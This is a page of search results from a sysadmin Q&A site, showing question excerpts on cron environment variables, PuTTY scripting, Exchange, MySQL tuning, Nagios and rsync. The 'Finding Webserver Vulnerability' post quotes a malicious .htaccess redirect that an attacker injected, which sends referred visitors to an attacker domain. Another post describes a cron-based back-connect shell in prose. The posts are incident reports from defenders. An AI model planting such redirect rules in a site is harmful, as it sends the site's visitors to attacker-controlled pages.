Search Results

Search found 22929 results on 918 pages for 'ssis script'.

Page 436/918 | < Previous Page | 432 433 434 435 436 437 438 439 440 441 442 443  | Next Page >

  • How to use a common library of environment variables among different languages?

    - by JDS
    We have three main languages with which we perform system tasks: Bash, Ruby, and PHP, and Perl. Four, four main languages. We use managed environment variables to provide authorization info that automated scripts need. For example, a mysql user account and password. We'd like to use one single managed file to maintain these variables. In some instances, for example, in cron, these environment variables are not available. They are made available in CLI scripts because we source the env file in everyone's profile. But something like cron doesn't do that. On the CLI, when the env file is sourced, any given script can access those variables. Bash has them directly, PHP in $_ENV, ruby in ENV, etc. We can't source the file into non-Bash scripts, because most languages implement shell commands by running them in a subshell. We considered parsing the Bash, converting to the script's lang, and running the equivalent of "exec(parsed_output)" on the resulting strings. What is a good solution to providing managed environment vars to scripts running in cron, or similar?

    Read the article

  • Send command through PuTTY automatic login

    - by Arthur
    I am using the following to login automatically to a remote server and then run commands listed in a commands.txt, like this: C:\path to\putty.exe -ssh adreese.ip -l user -pw Password -m C:\Path to\command.txt commands.txt contains the following: wakeonlan -i broadcast adress Macadress However, when I try to do so a new window for PuTTY appears, but it closes and exits instantly after login. As a result, I cannot see the output of the command(s). After a several tests, it appears that the command is not execute , cause my computer doesn't "wake on lan". I don't understand what's going on here ? I cannot use the plink.exe program cause I cannot make connection with public key ( too much distant site for doing all the registration keys in putty ) Can someone help me with this ? Or can i use another program to make ssh connection and send command with script from a windows os? Edit : I also try to make a bash file in the distant server with the same command and execute it from the session like this : C:\path to\putty.exe -ssh adreese.ip -l user -pw Password \home\user\script.sh Ihave the same problem... Need help please : /

    Read the article

  • How to extract attachments from Exchange 2003 database

    - by John
    I have an ancient Exchange 2003 server that I'm getting ready to retire. All user accounts have been migrated to Google Apps for Business, so no new mail is being sent or received on the server. There are less than 50 accounts on the server, but some are very large so that the whole Exchange database is between 10 and 20 GB. The largest account has over 100,000 messages. I believe that in the migration to Gmail, some attachments were not migrated. For peace of mind, I'd like to get the attachments out of the Exchange database. The only way I know of to do this is to set up a 2nd computer with Outlook on it, set up one of the accounts, and then sync the whole mail history and get the attachments out that way. Is there something simpler that I can do? Here are two possibilities: An Exchange attachment retrieval tool/script that pulls attachments for all accounts directly out of the Exchange database. An Exchange PST exporter tool/script that will export PST files for all accounts so that I can just load the PST files into Outlook at will.

    Read the article

  • Nginx: Loopback connection via PHP's getimage size crashes server (Magento's CMS)

    - by Alex
    We were able to trace down a problem that is crashing our NGINX server running Magento until the following point: Background info: Magento Backend has a CMS function with a WYSIWYG editor. This editor loads some pictures via a controller in magento (cms/directive). When we set the NGINX error_log level to info, we get the following lines (line break inserted for better readability): 2012/10/22 18:05:40 [info] 14105#0: *1 client closed prematurely connection, so upstream connection is closed too while sending request to upstream, client: XXXXXXXXX, server: test.local, request: "GET index.php/admin/cms_wysiwyg/directive/___directive/BASEENCODEDIMAGEURL,,/ HTTP/1.1", upstream: "fastcgi://127.0.0.1:9024", host: "test.local" When checking the code in the debugger, the following call does never return (in ´Varien_Image_Adapter_Abstract::getMimeType()` # $this->_fileName is http://test.local/skin/adminhtml/base/default/images/demo-image-not-existing.gif` # $_SERVER['REQUEST_URI'] = http://test.local/admin/cms_wysiwyg/directive/___directive/BASEENCODEDIMAGEURL list($this->_imageSrcWidth, $this->_imageSrcHeight, $this->_fileType, ) = getimagesize($this->_fileName); The filename requests is an URL to the same server which is requesting the script a link to a static .gif that is not existing. Sample URL: http://test.local/skin/adminhtml/base/default/images/demo-image-not-existing.gif When the above line executed, any subsequent request to the NGNIX server does not respond any more. After waiting for around 10 minutes, the NGINX server starts answering requests again. I tried to reproduce the error with a simple test script that only calls getimagesize() with the given URL - but this not crash. It simple leads to an exception saying that the URL could not be loaded (which is fine as the URL is wrong)

    Read the article

  • Why is my server performance degrading to the point of stopping, periodically?

    - by Pascal Aschwanden
    So, once in a while, I see in firebug that a request takes over 15 or even 60 seconds to respond and sometimes never. Here is what I've ruled out: It's not the CPU, cuz every time I check the Server load its less then 6 for all 3 numbers It's not the memory, because thats fairly low too, less the 50% It's not the I/O anymore, because I've seen the graphs that Joyent sent back to me when I requested them, and they show less then 3MB of I/O (mostly all read). It's not the SQL performance - I've profiled every last SQL command that runs, and they're all (99.9% of them anyway) running in less then 30ms, most run in less then 5ms. Oh and I've been profiling all the script execution times, and even the when the problem occurs, the script always manages to finish in 50ms or less (that's 1 / 20th of a second ). Now, I do run alot of ajax calls. 1 every 2 seconds per user and I have 300 DAU+. But, even if all 300 are playing simultaneously, thats still only 150 calls per second max. The only other thing I can think of is that one of my neighbors is funky. The problem is highly intermittent. 99% of the time it works perfectly and there's excellent performance. but 99%+ is not good enough. Eventually the performance gets so bad I have to restart the server, at which point everything is fine again. I've done this about 4 times now. Any ideas? Note: this is on joyent, vps, intro package 256mb of ram with bursting. here are the mysql dump info: Traffic ø per hour Received 18 MiB 29 MiB Sent 134 MiB 221 MiB Total 151 MiB 251 MiB Connections ø per hour % max. concurrent connections 5 --- --- Failed attempts 0 0.00 0.00% Aborted 0 0.00 0.00% Total 9,418 15.59 k 100.00%

    Read the article

  • Chrome will not load a web page with an <embed> element

    - by rossmcm
    I have been trying to get a simple sound web page going: Sound.html <script> function PlaySound () { var sounder = document.getElementById ("ToneA") ; sounder.Play () ; } </script> <embed id="ToneA" height="1" width="1" src="https://dl.dropboxusercontent.com/u/311035/ToneA.mp3" autostart="false" enablejavascript="true"//> <button onclick="PlaySound () ;">Play</button> The test web page is here. It plays in IE, but not in Firefox or Chrome. My problem: Chrome reports "Could not load VLC Plugin". It seems to be a known problem that the VLC community don't necessarily feel like fixing at the moment, and is a result of Google choosing not to allow some certain kind of plugin. If I disable the plugin I no longer get the message but nothing happens when I click the button. Looking at the console in a debug window I see Uncaught TypeError: undefined is not a function Sound.html:7 PlaySound Sound.html:7 onclick which suggests Chrome could not find anything else to handle the sound file. How to I tell Chrome to use (e.g.) Windows Media Player? * UPDATE * This is apparently because the VLC plugin is a NPAPI plugin and Chrome no longer supports these. I have uninstalled VLC and this has removed the error on loading the webpage with an embedded sound element, but it still doesn't invoke WMP instead.

    Read the article

  • How to use LVM on Rackspace Cloud

    - by batrick
    Dear all, I am trying to set up a simple but effective solution to make a backup of my rackspace cloud servers. These servers each run subversion, trac, and some database-backed custom php applications. My idea is to set up a LVM and mount a volume under, say, /srv. In this volume, I keep the data from all applications. Instead of caring about how to back-up each app in a different way (svn hotcopy, trac-admin hotcopy, huge mess for mysql), I simply take an LVM snapshot and back this one up cloud files using the excellent cloudcity script (http://github.com/jspringman/cloudcity/blob/master/cloudcity). The advantage of this solution is that it is quick and easy, and LVM allows to make decent backups. As more apps are added, it should not be required to change the backup script much. The downside, and main point of my question here, is that I am not sure how to get LVM working on Rackspace cloud, because there is only one root volume and no service like Amazon's EBS. I was thinking it may be possible to create a large empty file and use this as a "physical volume". Has anybody done anything like this before? Or do you know why it can never work? It would be great to hear from you. Thanks, batrick

    Read the article

  • Tuning up a MySQL server

    - by NinjaCat
    I inherited a mysql server, and so I've started with running the MySQLTuner.pl script. I am not a MySQL expert but I can see that there is definitely a mess here. I'm not looking to go after every single thing that needs fixing and tuning, but I do want to grab the major, low hanging fruit. Total Memory on the system is: 512MB. Yes, I know it's low, but it's what we have for the time being. Here's what the script had to say: General recommendations: Run OPTIMIZE TABLE to defragment tables for better performance MySQL started within last 24 hours - recommendations may be inaccurate Enable the slow query log to troubleshoot bad queries When making adjustments, make tmp_table_size/max_heap_table_size equal Reduce your SELECT DISTINCT queries without LIMIT clauses Increase table_cache gradually to avoid file descriptor limits Your applications are not closing MySQL connections properly Variables to adjust: query_cache_limit (> 1M, or use smaller result sets) tmp_table_size (> 16M) max_heap_table_size (> 16M) table_cache (> 64) innodb_buffer_pool_size (>= 326M) For the variables that it recommends that I adjust, I don't even see most of them in the mysql.cnf file. [client] port = 3306 socket = /var/run/mysqld/mysqld.sock [mysqld_safe] socket = /var/run/mysqld/mysqld.sock nice = 0 [mysqld] innodb_buffer_pool_size = 220M innodb_flush_log_at_trx_commit = 2 innodb_file_per_table = 1 innodb_thread_concurrency = 32 skip-locking big-tables max_connections = 50 innodb_lock_wait_timeout = 600 slave_transaction_retries = 10 innodb_table_locks = 0 innodb_additional_mem_pool_size = 20M user = mysql socket = /var/run/mysqld/mysqld.sock port = 3306 basedir = /usr datadir = /var/lib/mysql tmpdir = /tmp skip-external-locking bind-address = localhost key_buffer = 16M max_allowed_packet = 16M thread_stack = 192K thread_cache_size = 4 myisam-recover = BACKUP query_cache_limit = 1M query_cache_size = 16M log_error = /var/log/mysql/error.log expire_logs_days = 10 max_binlog_size = 100M skip-locking innodb_file_per_table = 1 big-tables [mysqldump] quick quote-names max_allowed_packet = 16M [mysql] [isamchk] key_buffer = 16M !includedir /etc/mysql/conf.d/

    Read the article

  • Finding Webserver Vulnerability

    - by Brent
    We operate a webserver farm hosting around 300 websites. Yesterday morning a script placed .htaccess files owned by www-data (the apache user) in every directory under the document_root of most (but not all) sites. The content of the .htaccess file was this: RewriteEngine On RewriteCond %{HTTP_REFERER} ^http:// RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR} Googling for that url (which is the md5 hash of "antivirus") I discovered that this same thing happened all over the internet, and am looking for somebody who has already dealt with this, and determined where the vulnerability is. I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing that have gotten further than I have in pinpointing the hole? So far we have determined: the changes were made as www-data, so apache or it's plugins are likely the culprit all the changes were made within 15 minutes of each other, so it was probably automated since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site) if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse) Any more hints would be appreciated.

    Read the article

  • Limited user requires admin rights for plug and play printer?

    - by Kalamane
    I have a small fleet of laptops that aren't part of a domain running Windows XP Pro SP3 as limited users. They are used for printing different shipping documents. I have a script that runs when they start up that uses devcon and prntmngr to detect and install/configure the currently connected usb printers. This lets us deploy the laptops to any printing station with a USB printer and have the printer 'just work' for the end user employee. I've taken the original clone image and have added functionality to it. Since then I've discovered a bit of an issue with using HP LaserJet P1606dn printers. They have started asking for admin rights on setup. This is with and without the script running. Previously they would automatically install because I had installed WHQL plug and play drivers for them. I thought it might have to do with the HP Smart Install Utility but it happens when that is disabled. I don't have a good point to roll back to before this started happening because this was an issue on the image I took initially to start this upgrade. What could be causing this?

    Read the article

  • suPHP not working

    - by amarc
    OS: Ubuntu 10.04 etc/suphp/suphp.conf: [global] ;Path to logfile logfile=/var/log/suphp/suphp.log ;Loglevel loglevel=info ;User Apache is running as webserver_user=www-data ;Path all scripts have to be in docroot=/home ;Path to chroot() to before executing script ;chroot=/mychroot ; Security options allow_file_group_writeable=false allow_file_others_writeable=false allow_directory_group_writeable=false allow_directory_others_writeable=false ;Check wheter script is within DOCUMENT_ROOT check_vhost_docroot=true ;Send minor error messages to browser errors_to_browser=false ;PATH environment variable env_path=/bin:/usr/bin ;Umask to set, specify in octal notation umask=0077 ; Minimum UID min_uid=100 ; Minimum GID min_gid=100 [handlers] ;Handler for php-scripts application/x-httpd-suphp="php:/usr/bin/php-cgi" ;Handler for CGI-scripts x-suphp-cgi="execute:!self" some vhost in sites-enabled: NameVirtualHost *:8080 <VirtualHost *:8080> ServerAdmin ... ServerName ... ServerAlias ... AddType application/x-httpd-php .php AddHandler application/x-httpd-php .php suPHP_Engine on suPHP_UserGroup user user suPHP_ConfigPath "/home/user/etc" suPHP_PHPPath /usr/bin DocumentRoot /home/user/web/site.com/ ErrorLog /var/log/apache2/site.com-error_log CustomLog /var/log/apache2/site.com-access_log common <Directory /home/user/web/site.com/> Order Deny,Allow Allow from all Options +Indexes </Directory> </VirtualHost> But when I did nano /home/user/web/id.php and paste <?php system('id'); ?> in it, result I get is: uid=33(www-data) gid=33(www-data) groups=33(www-data) Have no idea what to do so I was hoping comunity could help ty.

    Read the article

  • Log connections to program

    - by Zac
    Besides for using iptables to log incoming connections.. Is there a way to log established inbound connections to a service that you don't have the source to (suppose the service doesn't log stuff like this on its own)? What I'm wanting to do is gather some information based on who's connecting to be able to tell things like what times of the day the service is being used the most, where in the world the main user base is, etc. I am aware I can use netstat and just hook it up to a cron script, but that might not be accurate, since the script could only run as frequently as a minute. Here is what I am thinking right now: Write a program that constantly polls netstat, looking for established connections that didn't appear in the previous poll. This idea seems like such a waste of cpu time though, since there may not be a new connection.. Write a wrapper program that accepts inbound connections on whatever port the service runs on, but then I wouldn't know how to pass that connection along to the real service. Edit: Just occurred to me that this question might be better for stackoverflow, though I am not certain. Sorry if this is the wrong place.

    Read the article

  • Using sed to Download ComboFix automatically

    - by user901398
    I'm trying to write a shell script to grab the dynamic URL which ComboFix is located at at BleepingComputer.com/download/combofix However, for some reason I can't seem to get my regex to match the download link of the "click here" if the download doesn't work. I used a regex tester and it said I matched the link, but I can't seem to get it to work when I execute it, it turns up an empty result. Here's my entire script: #!/bin/bash # Download latest ComboFix from BleepingComputer wget -O Listing.html "http://www.bleepingcomputer.com/download/combofix/" -nv downloadpage=$(sed -ne 's@^.*<a href="\(http://www[.]bleepingcomputer[.]com/download/combofix/dl/[0-9]\+/\)" class="goodurl">.*$@\1@p' Listing.html) echo "DL Page: $downloadpage" secondpage="$downloadpage" wget -O Download.html $secondpage -nv file=$(sed -ne 's@^.*<a href="\(http://download[.]bleepingcomputer[.]com/dl/[0-9A-Fa-f]\+/[0-9A-Fa-f]\+/windows/security/anti[-]virus/c/combofix/ComboFix[.]exe\)">.*$@\1@p' Download.html) echo "File: $file" wget -O "ComboFix.exe" "$file" -nv rm Listing.html rm Download.html mkdir Tools mv "ComboFix.exe" "Tools/ComboFix.exe" -f The first two downloads work successfully, and I end up with: http://www.bleepingcomputer.com/download/combofix/dl/12/ But it fails to match the final sed that will give me the download link. The code it's supposed to match is: <a href="http://download.bleepingcomputer.com/dl/6c497ccbaff8226ec84c97dcdfc3ce9a/5058d931/windows/security/anti-virus/c/combofix/ComboFix.exe">click here</a>

    Read the article

  • Nagios send mail when server is down

    - by tzulberti
    I am using nagios 3.06 to monitor the servers. When a service is critical, it sends a mail, but when a server is down no mail is sent. Even if all the services go to critical state, no mail is sent. I have the following configuration: define command {     command_name notify-host-by-email     command_line python /etc/nagios3/send_mail.py "[Nagios] $HOSTNAME$" "******** Nagios ****\n\n Host: $HOSTNAME$\n Description: the server is down" } define command{     command_name notify-service-by-email     command_line python /etc/nagios3/send_mail.py "[Nagios] $HOSTNAME$: $SERVICEDESC$ ($NOTIFICATIONTYPE$)" "***** Nagios *****\n\nNotification Type: $NOTIFICATIONTYPE$\nService: $SERVICEDESC$\nHost: $HOSTALIAS$\nAddress: $HOSTADDRESS$\nState: $SERVICESTATE$\nDate/Time: $LONGDATETIME$\nAdditional Info:$SERVICEOUTPUT$" } The python script is a script to sent a mail. It works if I execute it from the command line, but it doesn't sents an email from nagios. What I am doing wrong? UPDATE: The contact data is: define contact{     contact_name root     alias Root     service_notification_period 24x7     host_notification_period 24x7     service_notification_options w,u,c,r     host_notification_options d,r     service_notification_commands notify-service-by-email     host_notification_commands notify-host-by-email     email [email protected] } define contactgroup{     contactgroup_name admins     alias Nagios Administrators     members root }

    Read the article

  • Wordpress on Apache is redirecting all https to http

    - by Krist van Besien
    I have a problem with a wordpress site on a server I admin. I don't know anything about wordpress however. My problem is that we want the site to be accessed over https, bot somehow all requests to https:// URLs are answered by the server with a 302, redirecting to http. The wordpress site itself is configured to use https, and we see that in the pages that are generated the links are all https links. In the apache config there are no rewrite rules and no redirects. However, any request to a https:// URL is answered with a redirect to the equivalent http URL. And I really would like to know where these redirects are coming from, what is generating these redirects. I've increased the loglevel on the webserver to DEBUG, but did not get any info there. I tried to enable debug logging in wordpress per the recipy I found here: http://codex.wordpress.org/Debugging_in_WordPress But did not get a debug.log file in the directory where one should appear. I'm really at a loss here, and need to fix this urgently. Any hints as where to start looking? Apache is 2.2.14 on Ubuntu. There are several other virtual hosts on this server, using php and https without any problem... Edit: I created a small info.php script and dropped that in the webservers' root. Calling this yields the output of the script, no redirect is generated. This suggest that it's not the webserver, but wordpress that is doing it. A second thing I noticed is that the redirect comes with several cookies, one of which has "httponly" set. Could that be it?

    Read the article

  • debian lenny email server

    - by Dal
    Hi I am a newbie and set up a debian lenny at home and set up the web and email server in the default installation. I followed the instructions for Exim and ran dpkg-reconfigure exim4-config and set it up for mydomainhere.com. I created a one line message file and attempted to test exim by running the command exim [email protected] < msgfile. I also tried using exim4 Exim but i get same error -bash: Exim: command not found. Obviously I am ignorant on how to run exim and test. I also tried to run a php file that sends a test mail and had no success. That script is tested and works fine if I send it from my hosting isp on a different domain. So I know the php script is good. I set up the debian system behind a netgear firewall and uses 192.168.1.x ip . The web server works great and users can visit my site. But I am lack the knowledge on how to get the email working. Appreciate is someone can guide me.

    Read the article

  • How do I rsync an entire folder based on the existence of a specific file type in that folder

    - by inquam
    I have a server set up that receives movies to a folder. I then serve these movies using DLNA. But in the initial folder where they end up all kind of files end up. Pictures, music, documents etc. I thought I'd fix this by running the following script inside that folder rsync -rvt --include='*/' --include='*.avi' --include='*.mkv' --exclude='*' . ../Movies/ This works and scans the given folder and moves all the found movies of the given extension types to the Movies folder. But I wonder if there is anyway to tell rsync to if a folder if found that includes a movie of the given extension types, sync the entire folder. Including other files such as .srt. This is to make it easier for me to get subtitles moved along with the movie. I have a solution figured out via a script made in php (yea, I actually do most of my scripting in linux using php... just a habbit that stuck a long time ago). But if rsync can handle it from the start that would be super. Also, I have noticed that this line of rsync actually copies all the root folders in the given folder. If no movie is in the folder it will create an empty folder. How do I prevent rsync from doing this... and saving me the trouble of deleting all folder in Movies that are empty.

    Read the article

  • Using screen to monitor non-interactive scripts (or some other solution)

    - by Michael
    I have some autonomous scripts that run commands on remote machines over ssh. These scripts rely on getting stdout, stderr, and the return code of each command run. I want to be able to monitor the progress of the scripts on each target machine so that I can see if something has hung and possibly intervene if necessary. My initial idea was to have the scripts run commands in a screen session, so that the person monitoring could simply attach to the session with screen -x. However, it was hard to do that from a script since screen is an interactive program. I can send a command to the screen session with screen -S session -X stuff "command^M", but then I don't get the output and return code that I need back. My second idea was to put script /path/to/log in ~/.bash_profile and log the entire session to a file. Then the monitoring person could simply tail the log file. However, this doesn't provide the interactivity that I was looking for. Any ideas on how to solve this problem?

    Read the article

  • reaching constant video bitrate by using ffmpeg

    - by sebastian
    We use ffmpeg and a transcoding script for transcoding and want to make some batch files which we can use for transcoding. For example I use a parameter called video_kbit and if I am writing in 30000 it should reach 30 Mbit. Of course if I use 6000 as parameter it should reach 6 MBit as well, so I have one script which reaches every video bitrate I want. As my settings are now, I only reach 18.1 Mbit. Only when I use 15000 as a parameter I am reaching my goal for a constant video bitrate of 15 MBit. If I use 8000 as parameter I get 10.1 MBit as a result. So under 15000, I get a higher bitrate and over 15000, I get a lower bitrate than I want. My presettings are: ffmpeg -threads "4" -i "$2" -f mp4 -c:v libx264 -crf 1 \ -bufsize 30000k -maxrate ${FC_PARAM_video_kbit}k \ -acodec libfaac -ac 2 -ab ${FC_PARAM_audio_kbit}k -ar 44100 \ -pix_fmt yuv420p -vf scale=${FC_PARAM_width}:${FC_PARAM_height} -y "$3" And I am using these parameters: FC_PARAM_video_kbit = 30000 FC_PARAM_audio_kbit = 192 FC_PARAM_width = 1920 FC_PARAM_height = 1080 I have tried using a higher bufsize and using profile:v and level settings, but nothing got me near the constant video bitrate of 30000 Mbit. Do you guys have any ideas or suggestions for a better way to reach my goal?

    Read the article

  • query keepalived

    - by tdimmig
    *Note: I have trouble deciding what should go in serverfault and what should go in superuser, if some kindly admin decides this is in the wrong place please move it for me - many thanks. I am implementing a basic HA system with keepalived. I only want to be notified of the failover in the case of hardware failure. I do, however, have the servers switch roles periodically. I have a track_script running on the backup that will vary it's return between 0 and 1 on an interval (once a week, once a month, whatever). Upon returning 0, the priority is raised above that of the master, upon returning 1 the priority is lowered again. This way they trade places on the configured interval. The question: What can I do to tell the difference between a switch caused by my script, and a switch caused because one of the servers died? I certainly want to be notified when there is an actual problem, but not every time the servers change places because of the script. I see that version 1.2.7 has snmp support and I may be able to use it to get some information that could tell me one way or another, but to be honest I've never used snmp before and I don't know how to get the information I want with it (my Google foo failed me).

    Read the article

  • How can I generate filesystem images that are usable on many different virtualization systems?

    - by Mark Longair
    I have written a script that generates a root filesystem image (based on Debian lenny) suitable for User-Mode Linux. (Essentially this script creates a filesystem image, mounts it with a loop device, uses debootstrap to create a lenny install, sets up a static IP for TUN/TAP networking, adds public keys for login by SSH and installs a web application.) These filesystem images work pretty well with UML, but it would be nice to be able to generate similar images that people can use on alternative virtualization software, and I'm not familiar with these options at all. In particular, since the idea is to use this image as a standalone server for testing the web application, it's important that the networking works. I wonder if anyone can suggest what would be involved in customizing such root filesystem images such that they could be used with other virtualization software, such as VMware, Xen or as an Amazon EC2 instance? Two particular concerns are: If such systems don't use a raw filesystem image (e.g. they need headers with metadata or are compressed in some particular way) do there exist tools to convert between the different formats? I assume that in the filesystem, at least /etc/network/interfaces will have to be customized, but are more involved changes likely to be necessary? Many thanks for any suggestions...

    Read the article

  • Preventing back connect in Cpanel servers

    - by Fernando
    We run a Cpanel server and someone gained access to almost all accounts using the following steps: 1) Gained access to an user account due to weak password. Note: this user didn't had shell access. 2) With this user account, he accessed Cpanel and added a cron task. The cron task was a perl script that connected to his IP and he was able to send back shell commands. 3) Having a non jailed shell, he was able to change content of most websites in server specially for users who set their folders to 777 ( Unfortunately a common recommendation and sometimes a requirement for some PHP softwares ). Is there a way to prevent this? We started by disabling cron in Cpanel interface, but this is not enough. I see a lot of other options in which an user could run this perl script. We have a firewall running and blocking uncommon outgoing ports. But he used port 80 and, well, I can't block this port as a lot of processes use them to access things, even Cpanel itself.

    Read the article

  • Reading log files from web application

    - by Egorinsk
    Hi! I want to write a small PHP application for monitoring logs on a Debian server, including syslog logs and Apache/PHP messages. The problem here is that Apache user (www-data) has no access to /var/log directory. What would be the best way to grant an access to logs for PHP application? Let's assume that log files can be really large, like hundreds of megabytes. I have some ideas: Write a shell script that would be run via sudo and tail last 512 Kb of log into a separate file that can be read by application - that's ineffective, because of forking a new process and having to read data twice Add www-data to adm group (that can read logs) - that's insecure Start a PHP process via cron every minute to read logs — that's not very good, because it doesn't allow real-time monitoring. Also, this script will be started even when I don't read logs, and consume CPU time (server is in the cloud, and I'll have to pay for it) Create a hardlink for all log files with lowered permissions - I guess, that won't work because logrotate could recreate log files and they'll change inode number. Start a separate nginx/Apache server under privileged user that may read logs. Maybe anyone got a better solution?

    Read the article

  • Why is "start in" needed for Windows scheduled tasks?

    - by GomoX
    We develop a web application that can be deployed on Windows or Linux. The Linux implementation uses cron, and the Windows one uses scheduled tasks to run a single PHP script that processes all scheduled tasks for our system. The task is scheduled using schtasks during the install process, like: This has always worked both under W2003 and W2008. A week ago a customer reported that scheduled tasks were not running. He is running on Windows 2008. We checked over and over and finally solved the issue by entering the folder that contains the .vbs script as the "start in" folder for the scheduled task. This said, there is no way to set up the "start in..." value from schtasks without using an XML definition of the tasks. XML definitions don't work in Windows 2003, so I would have to add windows version detection to the installer, additional testing, etc (I'd like to avoid this if at all possible). The only atypical thing I noticed about the install is that the system is installed in D:\ as opposed to the default C:\Program Files (x86)\, but I don't see how this would matter. All the paths are absolute in all the scripts. Can anyone suggest a reasonable solution for this?

    Read the article

  • Which scripting language to use to asynchronously ssh into equipment, run several commands, parse the output, and save to a file on my computer?

    - by Fujin
    There are several points I'd like to stress in my question. I'd like to login by asynchronously ssh'ing into our infrastructure equipment. Meaning, I do not want to connect to only one device, do all the tasks I need, disconnect, then connect to the next device. I want to connect to several devices at once in order to make the process as fast as possible. By equipment I mean 'infrastructure equipment' and not servers. I say this because I will not have the luxury of saving files to the device then transferring them to myself with scp or another method. The output of the scripts that are run will have to be saved directly to my computer. The output of the commands that are run will need to be cleaned up and parsed. Also I want the outputs of each device to be combined into one nice and neat file, not a separate file for each device. This will all be done from a linux box, using ssh, into devices that all use linux'ish proprietary OSes. My guess is the answer to my question will either be a Bash, Perl, or Python script but I figured it wouldn't hurt to ask and to hear the reasons why one way is better than another. Thanks everyone. EXTRA CREDIT: With you answer, include links to resources that will help create the script I described in the language that you suggested.

    Read the article

< Previous Page | 432 433 434 435 436 437 438 439 440 441 442 443  | Next Page >